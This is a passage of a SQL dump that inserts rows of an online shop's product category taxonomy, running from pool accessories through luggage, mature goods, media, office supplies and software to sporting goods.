(3937, 3937, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Cleaners & Chemicals'),
(3938, 3938, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Cover Accessories'),
(3939, 3939, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Covers & Ground Cloths'),
(3940, 3940, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Deck Kits'),
(3941, 3941, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Floats & Loungers'),
(3942, 3942, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Heaters'),
(3943, 3943, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Ladders, Steps & Ramps'),
(3944, 3944, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Liners'),
(3945, 3945, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Skimmers'),
(3946, 3946, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Sweeps & Vacuums'),
(3947, 3947, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Toys'),
(3948, 3948, 0, 'Home & Garden > Pool & Spa > Pool & Spa Accessories > Pool Water Slides'),
(3949, 3949, 0, 'Home & Garden > Pool & Spa > Saunas'),
(3950, 3950, 0, 'Home & Garden > Pool & Spa > Spas'),
(3951, 3951, 0, 'Home & Garden > Pool & Spa > Swimming Pools'),
(3952, 3952, 0, 'Home & Garden > Smoking Accessories'),
(3953, 3953, 0, 'Home & Garden > Smoking Accessories > Ashtrays'),
(3954, 3954, 0, 'Home & Garden > Smoking Accessories > Cigar Cases'),
(3955, 3955, 0, 'Home & Garden > Smoking Accessories > Cigar Cutters & Punches'),
(3956, 3956, 0, 'Home & Garden > Smoking Accessories > Cigarette Cases'),
(3957, 3957, 0, 'Home & Garden > Smoking Accessories > Cigarette Holders'),
(3958, 3958, 0, 'Home & Garden > Smoking Accessories > Humidor Accessories'),
(3959, 3959, 0, 'Home & Garden > Smoking Accessories > Humidors'),
(3960, 3960, 0, 'Home & Garden > Umbrella Sleeves & Cases'),
(3961, 3961, 0, 'Home & Garden > Wood Stoves'),
(3962, 3962, 0, 'Luggage & Bags'),
(3963, 3963, 0, 'Luggage & Bags > Backpacks'),
(3964, 3964, 0, 'Luggage & Bags > Briefcases'),
(3965, 3965, 0, 'Luggage & Bags > Cosmetic & Toiletry Bags'),
(3966, 3966, 0, 'Luggage & Bags > Diaper Bags'),
(3967, 3967, 0, 'Luggage & Bags > Dry Boxes'),
(3968, 3968, 0, 'Luggage & Bags > Duffel Bags'),
(3969, 3969, 0, 'Luggage & Bags > Fanny Packs'),
(3970, 3970, 0, 'Luggage & Bags > Garment Bags'),
(3971, 3971, 0, 'Luggage & Bags > Luggage Accessories'),
(3972, 3972, 0, 'Luggage & Bags > Luggage Accessories > Dry Box Liners & Inserts'),
(3973, 3973, 0, 'Luggage & Bags > Luggage Accessories > Luggage Covers'),
(3974, 3974, 0, 'Luggage & Bags > Luggage Accessories > Luggage Racks & Stands'),
(3975, 3975, 0, 'Luggage & Bags > Luggage Accessories > Luggage Straps'),
(3976, 3976, 0, 'Luggage & Bags > Luggage Accessories > Luggage Tags'),
(3977, 3977, 0, 'Luggage & Bags > Luggage Accessories > Packing Organizers'),
(3978, 3978, 0, 'Luggage & Bags > Luggage Accessories > Travel Bottles & Containers'),
(3979, 3979, 0, 'Luggage & Bags > Luggage Accessories > Travel Pouches'),
(3980, 3980, 0, 'Luggage & Bags > Messenger Bags'),
(3981, 3981, 0, 'Luggage & Bags > Shopping Totes'),
(3982, 3982, 0, 'Luggage & Bags > Suitcases'),
(3983, 3983, 0, 'Luggage & Bags > Train Cases'),
(3984, 3984, 0, 'Mature'),
(3985, 3985, 0, 'Mature > Erotic'),
(3986, 3986, 0, 'Mature > Erotic > Erotic Books'),
(3987, 3987, 0, 'Mature > Erotic > Erotic Clothing'),
(3988, 3988, 0, 'Mature > Erotic > Erotic DVDs & Videos'),
(3989, 3989, 0, 'Mature > Erotic > Erotic Food & Edibles'),
(3990, 3990, 0, 'Mature > Erotic > Erotic Games'),
(3991, 3991, 0, 'Mature > Erotic > Erotic Magazines'),
(3992, 3992, 0, 'Mature > Erotic > Pole Dancing Kits'),
(3993, 3993, 0, 'Mature > Erotic > Sex Toys'),
(3994, 3994, 0, 'Mature > Weapons'),
(3995, 3995, 0, 'Mature > Weapons > Brass Knuckles'),
(3996, 3996, 0, 'Mature > Weapons > Clubs & Batons'),
(3997, 3997, 0, 'Mature > Weapons > Combat Knives'),
(3998, 3998, 0, 'Mature > Weapons > Gun Care & Accessories'),
(3999, 3999, 0, 'Mature > Weapons > Gun Care & Accessories > Ammunition'),
(4000, 4000, 0, 'Mature > Weapons > Gun Care & Accessories > Ammunition Cases & Holders'),
(4001, 4001, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Cases & Range Bags'),
(4002, 4002, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Cleaning'),
(4003, 4003, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Cleaning > Gun Cleaning Cloths & Swabs'),
(4004, 4004, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Cleaning > Gun Cleaning Patches'),
(4005, 4005, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Cleaning > Gun Cleaning Solvents'),
(4006, 4006, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Grips'),
(4007, 4007, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Holsters'),
(4008, 4008, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Lights'),
(4009, 4009, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Rails'),
(4010, 4010, 0, 'Mature > Weapons > Gun Care & Accessories > Gun Slings'),
(4011, 4011, 0, 'Mature > Weapons > Gun Care & Accessories > Reloading Supplies & Equipment'),
(4012, 4012, 0, 'Mature > Weapons > Gun Care & Accessories > Reloading Supplies & Equipment > Ammunition Reloading Presses'),
(4013, 4013, 0, 'Mature > Weapons > Guns'),
(4014, 4014, 0, 'Mature > Weapons > Mace & Pepper Spray'),
(4015, 4015, 0, 'Mature > Weapons > Nunchucks'),
(4016, 4016, 0, 'Mature > Weapons > Spears'),
(4017, 4017, 0, 'Mature > Weapons > Staff & Stick Weapons'),
(4018, 4018, 0, 'Mature > Weapons > Stun Guns & Tasers'),
(4019, 4019, 0, 'Mature > Weapons > Swords'),
(4020, 4020, 0, 'Mature > Weapons > Throwing Stars'),
(4021, 4021, 0, 'Mature > Weapons > Whips'),
(4022, 4022, 0, 'Media'),
(4023, 4023, 0, 'Media > Books'),
(4024, 4024, 0, 'Media > Carpentry & Woodworking Project Plans'),
(4025, 4025, 0, 'Media > DVDs & Videos'),
(4026, 4026, 0, 'Media > Magazines & Newspapers'),
(4027, 4027, 0, 'Media > Music & Sound Recordings'),
(4028, 4028, 0, 'Media > Product Manuals'),
(4029, 4029, 0, 'Media > Product Manuals > Camera & Optics Manuals'),
(4030, 4030, 0, 'Media > Product Manuals > Electronics Manuals'),
(4031, 4031, 0, 'Media > Product Manuals > Exercise & Fitness Equipment Manuals'),
(4032, 4032, 0, 'Media > Product Manuals > Household Appliance Manuals'),
(4033, 4033, 0, 'Media > Product Manuals > Kitchen Appliance Manuals'),
(4034, 4034, 0, 'Media > Product Manuals > Model & Toys Manuals'),
(4035, 4035, 0, 'Media > Product Manuals > Office Supply Manuals'),
(4036, 4036, 0, 'Media > Product Manuals > Power Tool & Equipment Manuals'),
(4037, 4037, 0, 'Media > Product Manuals > Vehicle Service Manuals'),
(4038, 4038, 0, 'Media > Sheet Music'),
(4039, 4039, 0, 'Office Supplies'),
(4040, 4040, 0, 'Office Supplies > Book Accessories'),
(4041, 4041, 0, 'Office Supplies > Book Accessories > Book Covers'),
(4042, 4042, 0, 'Office Supplies > Book Accessories > Book Lights'),
(4043, 4043, 0, 'Office Supplies > Book Accessories > Book Stands & Rests'),
(4044, 4044, 0, 'Office Supplies > Book Accessories > Bookmarks'),
(4045, 4045, 0, 'Office Supplies > Desk Pads & Blotters'),
(4046, 4046, 0, 'Office Supplies > Filing & Organization'),
(4047, 4047, 0, 'Office Supplies > Filing & Organization > Address Books'),
(4048, 4048, 0, 'Office Supplies > Filing & Organization > Binding Supplies'),
(4049, 4049, 0, 'Office Supplies > Filing & Organization > Binding Supplies > Binder Accessories'),
(4050, 4050, 0, 'Office Supplies > Filing & Organization > Binding Supplies > Binder Accessories > Binder Rings'),
(4051, 4051, 0, 'Office Supplies > Filing & Organization > Binding Supplies > Binder Accessories > Index Dividers'),
(4052, 4052, 0, 'Office Supplies > Filing & Organization > Binding Supplies > Binder Accessories > Sheet Protectors'),
(4053, 4053, 0, 'Office Supplies > Filing & Organization > Binding Supplies > Binders'),
(4054, 4054, 0, 'Office Supplies > Filing & Organization > Binding Supplies > Binding Combs & Spines'),
(4055, 4055, 0, 'Office Supplies > Filing & Organization > Binding Supplies > Binding Machines'),
(4056, 4056, 0, 'Office Supplies > Filing & Organization > Business Card Books'),
(4057, 4057, 0, 'Office Supplies > Filing & Organization > Business Card Stands'),
(4058, 4058, 0, 'Office Supplies > Filing & Organization > CD/DVD Cases & Organizers'),
(4059, 4059, 0, 'Office Supplies > Filing & Organization > Calendars, Organizers & Planners'),
(4060, 4060, 0, 'Office Supplies > Filing & Organization > Card Files'),
(4061, 4061, 0, 'Office Supplies > Filing & Organization > Card Sleeves'),
(4062, 4062, 0, 'Office Supplies > Filing & Organization > Cash Boxes'),
(4063, 4063, 0, 'Office Supplies > Filing & Organization > Desk Organizers'),
(4064, 4064, 0, 'Office Supplies > Filing & Organization > File Boxes'),
(4065, 4065, 0, 'Office Supplies > Filing & Organization > File Folders'),
(4066, 4066, 0, 'Office Supplies > Filing & Organization > Folders & Report Covers'),
(4067, 4067, 0, 'Office Supplies > Filing & Organization > Greeting Card Organizers'),
(4068, 4068, 0, 'Office Supplies > Filing & Organization > Mail Sorters'),
(4069, 4069, 0, 'Office Supplies > Filing & Organization > Pen & Pencil Cases'),
(4070, 4070, 0, 'Office Supplies > Filing & Organization > Portfolios & Padfolios'),
(4071, 4071, 0, 'Office Supplies > Filing & Organization > Recipe Card Boxes'),
(4072, 4072, 0, 'Office Supplies > General Office Supplies'),
(4073, 4073, 0, 'Office Supplies > General Office Supplies > Brass Fasteners'),
(4074, 4074, 0, 'Office Supplies > General Office Supplies > Correction Fluids, Pens & Tapes'),
(4075, 4075, 0, 'Office Supplies > General Office Supplies > Erasers'),
(4076, 4076, 0, 'Office Supplies > General Office Supplies > Labels & Tags'),
(4077, 4077, 0, 'Office Supplies > General Office Supplies > Labels & Tags > Address Labels'),
(4078, 4078, 0, 'Office Supplies > General Office Supplies > Labels & Tags > Folder Tabs'),
(4079, 4079, 0, 'Office Supplies > General Office Supplies > Labels & Tags > Label Clips'),
(4080, 4080, 0, 'Office Supplies > General Office Supplies > Labels & Tags > Label Tapes & Refill Rolls'),
(4081, 4081, 0, 'Office Supplies > General Office Supplies > Labels & Tags > Shipping Labels'),
(4082, 4082, 0, 'Office Supplies > General Office Supplies > Labels & Tags > Shipping Tags'),
(4083, 4083, 0, 'Office Supplies > General Office Supplies > Laminating Film, Pouches & Sheets'),
(4084, 4084, 0, 'Office Supplies > General Office Supplies > Mounting Putty'),
(4085, 4085, 0, 'Office Supplies > General Office Supplies > Office Tape'),
(4086, 4086, 0, 'Office Supplies > General Office Supplies > Paper Clips & Clamps'),
(4087, 4087, 0, 'Office Supplies > General Office Supplies > Paper Products'),
(4088, 4088, 0, 'Office Supplies > General Office Supplies > Paper Products > Binder Paper'),
(4089, 4089, 0, 'Office Supplies > General Office Supplies > Paper Products > Blank ID Cards'),
(4090, 4090, 0, 'Office Supplies > General Office Supplies > Paper Products > Business Cards'),
(4091, 4091, 0, 'Office Supplies > General Office Supplies > Paper Products > Business Forms & Receipts'),
(4092, 4092, 0, 'Office Supplies > General Office Supplies > Paper Products > Checks'),
(4093, 4093, 0, 'Office Supplies > General Office Supplies > Paper Products > Cover Paper'),
(4094, 4094, 0, 'Office Supplies > General Office Supplies > Paper Products > Envelopes'),
(4095, 4095, 0, 'Office Supplies > General Office Supplies > Paper Products > Index Cards'),
(4096, 4096, 0, 'Office Supplies > General Office Supplies > Paper Products > Notebooks & Notepads'),
(4097, 4097, 0, 'Office Supplies > General Office Supplies > Paper Products > Post Cards'),
(4098, 4098, 0, 'Office Supplies > General Office Supplies > Paper Products > Printer & Copier Paper'),
(4099, 4099, 0, 'Office Supplies > General Office Supplies > Paper Products > Receipt & Adding Machine Paper Rolls'),
(4100, 4100, 0, 'Office Supplies > General Office Supplies > Paper Products > Stationery'),
(4101, 4101, 0, 'Office Supplies > General Office Supplies > Paper Products > Sticky Notes'),
(4102, 4102, 0, 'Office Supplies > General Office Supplies > Rubber Bands'),
(4103, 4103, 0, 'Office Supplies > General Office Supplies > Staples'),
(4104, 4104, 0, 'Office Supplies > General Office Supplies > Tacks & Pushpins'),
(4105, 4105, 0, 'Office Supplies > Impulse Sealers'),
(4106, 4106, 0, 'Office Supplies > Lap Desks'),
(4107, 4107, 0, 'Office Supplies > Name Plates'),
(4108, 4108, 0, 'Office Supplies > Office & Chair Mats'),
(4109, 4109, 0, 'Office Supplies > Office & Chair Mats > Anti-Fatigue Mats'),
(4110, 4110, 0, 'Office Supplies > Office & Chair Mats > Chair Mats'),
(4111, 4111, 0, 'Office Supplies > Office & Chair Mats > Office Mats'),
(4112, 4112, 0, 'Office Supplies > Office Carts'),
(4113, 4113, 0, 'Office Supplies > Office Carts > AV Carts'),
(4114, 4114, 0, 'Office Supplies > Office Carts > Book Carts'),
(4115, 4115, 0, 'Office Supplies > Office Carts > File Carts'),
(4116, 4116, 0, 'Office Supplies > Office Carts > Mail Carts'),
(4117, 4117, 0, 'Office Supplies > Office Carts > Utility Carts'),
(4118, 4118, 0, 'Office Supplies > Office Equipment'),
(4119, 4119, 0, 'Office Supplies > Office Equipment > Calculator Accessories'),
(4120, 4120, 0, 'Office Supplies > Office Equipment > Calculators'),
(4121, 4121, 0, 'Office Supplies > Office Equipment > Electronic Dictionaries & Translators'),
(4122, 4122, 0, 'Office Supplies > Office Equipment > Label Makers'),
(4123, 4123, 0, 'Office Supplies > Office Equipment > Laminators'),
(4124, 4124, 0, 'Office Supplies > Office Equipment > Office Shredders'),
(4125, 4125, 0, 'Office Supplies > Office Equipment > Postage Meters'),
(4126, 4126, 0, 'Office Supplies > Office Equipment > Time & Attendance Clocks'),
(4127, 4127, 0, 'Office Supplies > Office Equipment > Transcribers & Dictation Systems'),
(4128, 4128, 0, 'Office Supplies > Office Equipment > Typewriters'),
(4129, 4129, 0, 'Office Supplies > Office Instruments'),
(4130, 4130, 0, 'Office Supplies > Office Instruments > Call Bells'),
(4131, 4131, 0, 'Office Supplies > Office Instruments > Clipboards'),
(4132, 4132, 0, 'Office Supplies > Office Instruments > Letter Openers'),
(4133, 4133, 0, 'Office Supplies > Office Instruments > Magnifiers'),
(4134, 4134, 0, 'Office Supplies > Office Instruments > Office Rubber Stamps'),
(4135, 4135, 0, 'Office Supplies > Office Instruments > Pencil Sharpeners'),
(4136, 4136, 0, 'Office Supplies > Office Instruments > Staple Removers'),
(4137, 4137, 0, 'Office Supplies > Office Instruments > Staplers'),
(4138, 4138, 0, 'Office Supplies > Office Instruments > Tape Dispensers'),
(4139, 4139, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instrument Accessories'),
(4140, 4140, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instrument Accessories > Marker & Highlighter Ink Refills'),
(4141, 4141, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instrument Accessories > Pen Ink & Refills'),
(4142, 4142, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instrument Accessories > Pencil Lead & Refills'),
(4143, 4143, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments'),
(4144, 4144, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Art Charcoals'),
(4145, 4145, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Chalk'),
(4146, 4146, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Crayons'),
(4147, 4147, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Markers & Highlighters'),
(4148, 4148, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Multifunction Writing Instruments'),
(4149, 4149, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Pastels'),
(4150, 4150, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Pens & Pencils'),
(4151, 4151, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Pens & Pencils > Pen & Pencil Sets'),
(4152, 4152, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Pens & Pencils > Pencils'),
(4153, 4153, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Pens & Pencils > Pencils > Art Pencils'),
(4154, 4154, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Pens & Pencils > Pencils > Writing Pencils'),
(4155, 4155, 0, 'Office Supplies > Office Instruments > Writing & Drawing Instruments > Pens & Pencils > Pens'),
(4156, 4156, 0, 'Office Supplies > Paper Handling'),
(4157, 4157, 0, 'Office Supplies > Paper Handling > Fingertip Grips'),
(4158, 4158, 0, 'Office Supplies > Paper Handling > Hole Punches'),
(4159, 4159, 0, 'Office Supplies > Paper Handling > Paper Folding Machines'),
(4160, 4160, 0, 'Office Supplies > Paper Handling > Paper Joggers'),
(4161, 4161, 0, 'Office Supplies > Paper Handling > Paperweights'),
(4162, 4162, 0, 'Office Supplies > Paper Handling > Pencil Boards'),
(4163, 4163, 0, 'Office Supplies > Presentation Supplies'),
(4164, 4164, 0, 'Office Supplies > Presentation Supplies > Chalkboards'),
(4165, 4165, 0, 'Office Supplies > Presentation Supplies > Display Boards'),
(4166, 4166, 0, 'Office Supplies > Presentation Supplies > Display Boards > Bulletin Board Accessories'),
(4167, 4167, 0, 'Office Supplies > Presentation Supplies > Display Boards > Bulletin Board Accessories > Bulletin Board Trim'),
(4168, 4168, 0, 'Office Supplies > Presentation Supplies > Display Boards > Bulletin Boards'),
(4169, 4169, 0, 'Office Supplies > Presentation Supplies > Display Boards > Foam Boards'),
(4170, 4170, 0, 'Office Supplies > Presentation Supplies > Display Boards > Mounting Boards'),
(4171, 4171, 0, 'Office Supplies > Presentation Supplies > Display Boards > Poster Boards'),
(4172, 4172, 0, 'Office Supplies > Presentation Supplies > Document Cameras'),
(4173, 4173, 0, 'Office Supplies > Presentation Supplies > Dry-Erase Boards'),
(4174, 4174, 0, 'Office Supplies > Presentation Supplies > Easel Pads'),
(4175, 4175, 0, 'Office Supplies > Presentation Supplies > Easels'),
(4176, 4176, 0, 'Office Supplies > Presentation Supplies > Laser Pointers'),
(4177, 4177, 0, 'Office Supplies > Presentation Supplies > Lecterns'),
(4178, 4178, 0, 'Office Supplies > Presentation Supplies > Transparencies'),
(4179, 4179, 0, 'Office Supplies > Presentation Supplies > Wireless Presenters'),
(4180, 4180, 0, 'Office Supplies > Shipping Supplies'),
(4181, 4181, 0, 'Office Supplies > Shipping Supplies > Moving & Shipping Boxes'),
(4182, 4182, 0, 'Office Supplies > Shipping Supplies > Packing Materials'),
(4183, 4183, 0, 'Office Supplies > Shipping Supplies > Packing Tape'),
(4184, 4184, 0, 'Religious & Ceremonial'),
(4185, 4185, 0, 'Religious & Ceremonial > Memorial Ceremony Supplies'),
(4186, 4186, 0, 'Religious & Ceremonial > Memorial Ceremony Supplies > Memorial Urns'),
(4187, 4187, 0, 'Religious & Ceremonial > Religious Items'),
(4188, 4188, 0, 'Religious & Ceremonial > Religious Items > Prayer Beads'),
(4189, 4189, 0, 'Religious & Ceremonial > Religious Items > Prayer Cards'),
(4190, 4190, 0, 'Religious & Ceremonial > Religious Items > Religious Altars'),
(4191, 4191, 0, 'Religious & Ceremonial > Religious Items > Religious Veils'),
(4192, 4192, 0, 'Religious & Ceremonial > Religious Items > Tarot Cards'),
(4193, 4193, 0, 'Religious & Ceremonial > Wedding Ceremony Supplies'),
(4194, 4194, 0, 'Religious & Ceremonial > Wedding Ceremony Supplies > Aisle Runners'),
(4195, 4195, 0, 'Religious & Ceremonial > Wedding Ceremony Supplies > Flower Girl Baskets'),
(4196, 4196, 0, 'Religious & Ceremonial > Wedding Ceremony Supplies > Ring Pillows & Holders'),
(4197, 4197, 0, 'Software'),
(4198, 4198, 0, 'Software > Computer Software'),
(4199, 4199, 0, 'Software > Computer Software > Antivirus & Security Software'),
(4200, 4200, 0, 'Software > Computer Software > Business & Productivity Software'),
(4201, 4201, 0, 'Software > Computer Software > Compilers & Programming Tools'),
(4202, 4202, 0, 'Software > Computer Software > Computer Utilities & Maintenance Software'),
(4203, 4203, 0, 'Software > Computer Software > Dictionary & Translation Software'),
(4204, 4204, 0, 'Software > Computer Software > Educational Software'),
(4205, 4205, 0, 'Software > Computer Software > Financial, Tax & Accounting Software'),
(4206, 4206, 0, 'Software > Computer Software > GPS Map Data & Software'),
(4207, 4207, 0, 'Software > Computer Software > Handheld & PDA Software'),
(4208, 4208, 0, 'Software > Computer Software > Multimedia & Design Software'),
(4209, 4209, 0, 'Software > Computer Software > Multimedia & Design Software > 3D Modeling Software'),
(4210, 4210, 0, 'Software > Computer Software > Multimedia & Design Software > Animation Editing Software'),
(4211, 4211, 0, 'Software > Computer Software > Multimedia & Design Software > Graphic Design & Illustration Software'),
(4212, 4212, 0, 'Software > Computer Software > Multimedia & Design Software > Home & Interior Design Software'),
(4213, 4213, 0, 'Software > Computer Software > Multimedia & Design Software > Home Publishing Software'),
(4214, 4214, 0, 'Software > Computer Software > Multimedia & Design Software > Media Viewing Software'),
(4215, 4215, 0, 'Software > Computer Software > Multimedia & Design Software > Music Composition Software'),
(4216, 4216, 0, 'Software > Computer Software > Multimedia & Design Software > Sound Editing Software'),
(4217, 4217, 0, 'Software > Computer Software > Multimedia & Design Software > Video Editing Software'),
(4218, 4218, 0, 'Software > Computer Software > Multimedia & Design Software > Web Design Software'),
(4219, 4219, 0, 'Software > Computer Software > Network Software'),
(4220, 4220, 0, 'Software > Computer Software > Office Application Software'),
(4221, 4221, 0, 'Software > Computer Software > Operating Systems'),
(4222, 4222, 0, 'Software > Computer Software > Restore Disks'),
(4223, 4223, 0, 'Software > Digital Goods & Currency'),
(4224, 4224, 0, 'Software > Digital Goods & Currency > Computer Icons'),
(4225, 4225, 0, 'Software > Digital Goods & Currency > Desktop Wallpaper'),
(4226, 4226, 0, 'Software > Digital Goods & Currency > Digital Artwork'),
(4227, 4227, 0, 'Software > Digital Goods & Currency > Document Templates'),
(4228, 4228, 0, 'Software > Digital Goods & Currency > Fonts'),
(4229, 4229, 0, 'Software > Digital Goods & Currency > Stock Photographs & Video Footage'),
(4230, 4230, 0, 'Software > Digital Goods & Currency > Virtual Currency'),
(4231, 4231, 0, 'Software > Video Game Software'),
(4232, 4232, 0, 'Sporting Goods'),
(4233, 4233, 0, 'Sporting Goods > Athletics'),
(4234, 4234, 0, 'Sporting Goods > Athletics > Baseball & Softball');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(4235, 4235, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Bases & Plates'),
(4236, 4236, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Batting Gloves'),
(4237, 4237, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Gloves & Mitts'),
(4238, 4238, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Pitching Mats'),
(4239, 4239, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Pitching Mounds'),
(4240, 4240, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Protective Gear'),
(4241, 4241, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Protective Gear > Baseball & Softball Batting Helmets'),
(4242, 4242, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Protective Gear > Baseball & Softball Chest Protectors'),
(4243, 4243, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Protective Gear > Baseball & Softball Leg Guards'),
(4244, 4244, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Protective Gear > Catchers Equipment Sets'),
(4245, 4245, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball & Softball Protective Gear > Catchers Helmets & Masks'),
(4246, 4246, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseball Bats'),
(4247, 4247, 0, 'Sporting Goods > Athletics > Baseball & Softball > Baseballs'),
(4248, 4248, 0, 'Sporting Goods > Athletics > Baseball & Softball > Pitching Machines'),
(4249, 4249, 0, 'Sporting Goods > Athletics > Baseball & Softball > Softball Bats'),
(4250, 4250, 0, 'Sporting Goods > Athletics > Baseball & Softball > Softballs'),
(4251, 4251, 0, 'Sporting Goods > Athletics > Basketball'),
(4252, 4252, 0, 'Sporting Goods > Athletics > Basketball > Basketball Hoop Parts & Accessories'),
(4253, 4253, 0, 'Sporting Goods > Athletics > Basketball > Basketball Hoop Parts & Accessories > Basketball Backboards'),
(4254, 4254, 0, 'Sporting Goods > Athletics > Basketball > Basketball Hoop Parts & Accessories > Basketball Hoop Padding'),
(4255, 4255, 0, 'Sporting Goods > Athletics > Basketball > Basketball Hoop Parts & Accessories > Basketball Hoop Posts'),
(4256, 4256, 0, 'Sporting Goods > Athletics > Basketball > Basketball Hoop Parts & Accessories > Basketball Nets'),
(4257, 4257, 0, 'Sporting Goods > Athletics > Basketball > Basketball Hoop Parts & Accessories > Basketball Rims'),
(4258, 4258, 0, 'Sporting Goods > Athletics > Basketball > Basketball Hoops'),
(4259, 4259, 0, 'Sporting Goods > Athletics > Basketball > Basketball Training Aids'),
(4260, 4260, 0, 'Sporting Goods > Athletics > Basketball > Basketballs'),
(4261, 4261, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts'),
(4262, 4262, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Protective Gear'),
(4263, 4263, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Protective Gear > Boxing & MMA Hand Wraps'),
(4264, 4264, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Protective Gear > Boxing & Martial Arts Arm Guards'),
(4265, 4265, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Protective Gear > Boxing & Martial Arts Body Protectors'),
(4266, 4266, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Protective Gear > Boxing & Martial Arts Headgear'),
(4267, 4267, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Protective Gear > Boxing Gloves & Mitts'),
(4268, 4268, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Protective Gear > MMA Shin Guards'),
(4269, 4269, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Training Equipment'),
(4270, 4270, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Training Equipment > Boxing & MMA Punch Mitts'),
(4271, 4271, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Training Equipment > Grappling Dummies'),
(4272, 4272, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Training Equipment > Punching & Training Bag Accessories'),
(4273, 4273, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Training Equipment > Punching & Training Bags'),
(4274, 4274, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing & Martial Arts Training Equipment > Strike Shields'),
(4275, 4275, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing Ring Parts'),
(4276, 4276, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Boxing Rings'),
(4277, 4277, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Martial Arts Belts'),
(4278, 4278, 0, 'Sporting Goods > Athletics > Boxing & Martial Arts > Martial Arts Weapons'),
(4279, 4279, 0, 'Sporting Goods > Athletics > Broomball Equipment'),
(4280, 4280, 0, 'Sporting Goods > Athletics > Cheerleading'),
(4281, 4281, 0, 'Sporting Goods > Athletics > Cheerleading > Cheerleading Pom Poms'),
(4282, 4282, 0, 'Sporting Goods > Athletics > Coaching & Officiating'),
(4283, 4283, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Captains Armbands'),
(4284, 4284, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Field & Court Boundary Markers'),
(4285, 4285, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Flip Coins & Discs'),
(4286, 4286, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Linesman Flags'),
(4287, 4287, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Penalty Cards & Flags'),
(4288, 4288, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Pitch Counters'),
(4289, 4289, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Referee Stands & Chairs'),
(4290, 4290, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Referee Wallets'),
(4291, 4291, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Scoreboards'),
(4292, 4292, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Sport & Safety Whistles'),
(4293, 4293, 0, 'Sporting Goods > Athletics > Coaching & Officiating > Umpire Indicators'),
(4294, 4294, 0, 'Sporting Goods > Athletics > Cricket'),
